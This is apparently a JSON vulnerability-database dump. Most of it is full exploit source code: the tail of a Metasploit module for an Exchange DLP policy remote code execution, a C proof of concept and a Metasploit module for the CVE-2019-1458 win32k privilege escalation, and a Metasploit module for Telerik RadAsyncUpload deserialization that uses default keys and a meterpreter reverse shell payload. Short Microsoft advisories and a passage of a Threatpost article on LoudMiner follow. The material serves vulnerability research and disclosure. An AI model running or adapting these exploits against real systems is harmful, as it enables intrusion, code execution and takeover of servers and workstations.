\ntrue \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && res.body.include?('<title>Outlook</title>') \nreturn CheckCode::Unknown('Target does not appear to be running OWA.') \nend \n \nCheckCode::Detected(\"OWA is running at #{full_uri('/owa/')}\") \nend \n \ndef exploit \nowa_login \ncreate_dlp_policy(retrieve_viewstate) \nend \n \ndef owa_login \nunless username && password \nfail_with(Failure::BadConfig, 'USERNAME and PASSWORD are required for exploitation') \nend \n \nprint_status(\"Logging in to OWA with creds #{username}:#{password}\") \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/owa/auth.owa'), \n'vars_post' => { \n'username' => username, \n'password' => password, \n'flags' => '', \n'destination' => full_uri('/owa/', vhost_uri: true) \n}, \n'keep_cookies' => true \n}, datastore['HttpClientTimeout'], 2) # timeout and redirect_depth \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access OWA login page') \nend \n \nunless res.code == 200 && cookie_jar.grep(/^cadata/).any? 
\nif res.body.include?('There are too many active sessions connected to this mailbox.') \nfail_with(Failure::NoAccess, 'Reached active session limit for mailbox') \nend \n \nfail_with(Failure::NoAccess, 'Failed to log in to OWA with supplied creds') \nend \n \nif res.body.include?('Choose your preferred display language and home time zone below.') \nfail_with(Failure::NoAccess, 'Mailbox is active but not fully configured') \nend \n \nprint_good('Successfully logged in to OWA') \nend \n \ndef retrieve_viewstate \nprint_status('Retrieving ViewState from DLP policy creation page') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'keep_cookies' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access DLP policy creation page') \nend \n \nunless res.code == 200 && (viewstate = res.get_html_document.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve ViewState') \nend \n \nprint_good('Successfully retrieved ViewState') \nviewstate \nend \n \ndef create_dlp_policy(viewstate) \nprint_status('Creating custom DLP policy from malicious template') \nvprint_status(\"DLP policy name: #{dlp_policy_name}\") \n \nform_data = Rex::MIME::Message.new \nform_data.add_part(viewstate, nil, nil, 'form-data; name=\"__VIEWSTATE\"') \nform_data.add_part( \n'ResultPanePlaceHolder_ButtonsPanel_btnNext', \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$senderBtn\"' \n) \nform_data.add_part( \ndlp_policy_name, \nnil, \nnil, \n'form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$name\"' \n) \nform_data.add_part( \ndlp_policy_template, \n'text/xml', \nnil, \n%(form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl\"; filename=\"#{dlp_policy_filename}\") \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => 
normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'), \n'agent' => '', # HACK: Bypass Exchange's User-Agent validation \n'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\", \n'data' => form_data.to_s \n}, 0) \nend \n \ndef dlp_policy_template \n# https://docs.microsoft.com/en-us/exchange/developing-dlp-policy-template-files-exchange-2013-help \n<<~XML \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<dlpPolicyTemplates> \n<dlpPolicyTemplate id=\"F7C29AEC-A52D-4502-9670-141424A83FAB\" mode=\"Audit\" state=\"Enabled\" version=\"15.0.2.0\"> \n<contentVersion>4</contentVersion> \n<publisherName>Metasploit</publisherName> \n<name> \n<localizedString lang=\"en\">#{dlp_policy_name}</localizedString> \n</name> \n<description> \n<localizedString lang=\"en\">wvu was here</localizedString> \n</description> \n<keywords></keywords> \n<ruleParameters></ruleParameters> \n<policyCommands> \n<commandBlock> \n<![CDATA[#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}]]> \n</commandBlock> \n</policyCommands> \n<policyCommandsResources></policyCommandsResources> \n</dlpPolicyTemplate> \n</dlpPolicyTemplates> \nXML \nend \n \ndef dlp_policy_name \n@dlp_policy_name ||= \"#{Faker::Bank.name.titleize} Data\" \nend \n \ndef dlp_policy_filename \n@dlp_policy_filename ||= \"#{rand_text_alphanumeric(8..42)}.xml\" \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159210/exchange_ecp_dlp_policy.rb.txt"}, {"lastseen": "2020-03-09T22:44:29", "description": "", "published": "2020-03-06T00:00:00", "type": "packetstorm", "title": "Microsoft Windows WizardOpium Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-06T00:00:00", "id": "PACKETSTORM:156651", "href": "https://packetstormsecurity.com/files/156651/Microsoft-Windows-WizardOpium-Local-Privilege-Escalation.html", "sourceData": "`#include <cstdio> 
\n#include <windows.h> \n \nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii); \n \nint main() { \nHINSTANCE hInstance = GetModuleHandle(NULL); \n \nWNDCLASSEX wcx; \nZeroMemory(&wcx, sizeof(wcx)); \nwcx.hInstance = hInstance; \nwcx.cbSize = sizeof(wcx); \nwcx.lpszClassName = L\"SploitWnd\"; \nwcx.lpfnWndProc = DefWindowProc; \nwcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0 \n \nprintf(\"[*] Registering window\\n\"); \nATOM wndAtom = RegisterClassEx(&wcx); \nif (wndAtom == INVALID_ATOM) { \nprintf(\"[-] Failed registering SploitWnd window class\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Creating instance of this window\\n\"); \nHWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \nif (sploitWnd == INVALID_HANDLE_VALUE) { \nprintf(\"[-] Failed to create SploitWnd window\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\"); \nNtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1); \n \nprintf(\"[*] Allocate memory to be used for corruption\\n\"); \nPVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); \nprintf(\"\\tptr: %p\\n\", mem); \nPBYTE byteView = (PBYTE)mem; \nbyteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow \n \n//pass DrawSwitchWndHilite double dereference \nPVOID* ulongView = (PVOID*)mem; \nulongView[0x20 / sizeof(PVOID)] = mem; \n \nprintf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\"); \nSetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem); \nprintf(\"[*] GetLastError = %x\\n\", GetLastError()); \n \nprintf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\"); \nHWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \n \nprintf(\"[*] Simulating alt key 
press\\n\"); \nBYTE keyState[256]; \nGetKeyboardState(keyState); \nkeyState[VK_MENU] |= 0x80; \nSetKeyboardState(keyState); \n \nprintf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\"); \nNtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1); \n} \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156651/mswindowswizard-escalate.txt"}, {"lastseen": "2020-10-15T19:31:18", "description": "", "published": "2020-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": "PACKETSTORM:159569", "href": "https://packetstormsecurity.com/files/159569/Microsoft-Windows-Uninitialized-Variable-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/file' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/post/windows/priv' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', \n'Description' => %q{ \nThis module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability \nwithin win32k which occurs due to an uninitalized variable, which allows user mode attackers \nto write a limited amount of controlled data to an attacker controlled address \nin kernel memory. 
By utilizing this vulnerability to execute controlled writes \nto kernel memory, an attacker can gain arbitrary code execution \nas the SYSTEM user. \n \nThis module has been tested against Windows 7 x64 SP1. Offsets within the \nexploit code may need to be adjusted to work with other versions of Windows. \nThe exploit can only be triggered once against the target and can cause the \ntarget machine to reboot when the session is terminated. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'piotrflorczyk', # poc \n'unamer', # exploit \n'timwr', # msf module \n], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows 7 x64', { 'Arch' => ARCH_X64 }] \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS ], \n'Reliability' => [ UNRELIABLE_SESSION ] \n}, \n'References' => \n[ \n['CVE', '2019-1458'], \n['URL', 'https://github.com/unamer/CVE-2019-1458'], \n['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], \n['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], \n['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] \n], \n'DisclosureDate' => '2019-12-10', \n'DefaultTarget' => 0, \n'AKA' => [ 'WizardOpium' ] \n) \n) \nregister_options([ \nOptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) \n]) \nend \n \ndef setup_process \nprocess_name = datastore['PROCESS'] \nbegin \nprint_status(\"Launching #{process_name} to host the exploit...\") \nlaunch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) \nprocess = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. 
Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprocess \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe \nend \n \nfile_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys') \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nbuild_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\") \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 \nreturn 
CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] != ARCH_X64 \nfail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') \nend \n \nprocess = setup_process \nlibrary_data = exploit_data('CVE-2019-1458', 'exploit.dll') \nprint_status(\"Injecting exploit into #{process.pid} ...\") \nexploit_mem, offset = inject_dll_data_into_process(process, library_data) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159569/cve_2019_1458_wizardopium.rb.txt"}, {"lastseen": "2020-10-20T20:37:38", "description": "", "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n 
\nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). 
\n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 
'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? 
\nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} 
\nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') 
\nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt"}], "mscve": [{"lastseen": "2020-10-22T11:03:45", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "edition": 2, "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16952", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952", "published": "2020-10-13T07:00:00", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-21T14:46:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16875"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. 
Exploitation of the vulnerability requires an authenticated user in a certain Exchange role to be compromised.\n\nThe security update addresses the vulnerability by correcting how Microsoft Exchange handles cmdlet arguments.\n", "edition": 4, "modified": "2020-09-08T07:00:00", "id": "MS:CVE-2020-16875", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", "published": "2020-09-08T07:00:00", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how Win32k handles objects in memory.\n", "edition": 2, "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1458", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458", "published": "2019-12-10T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-05-07T21:56:19", "bulletinFamily": "info", "cvelist": ["CVE-2019-18935"], "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. 
It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. 
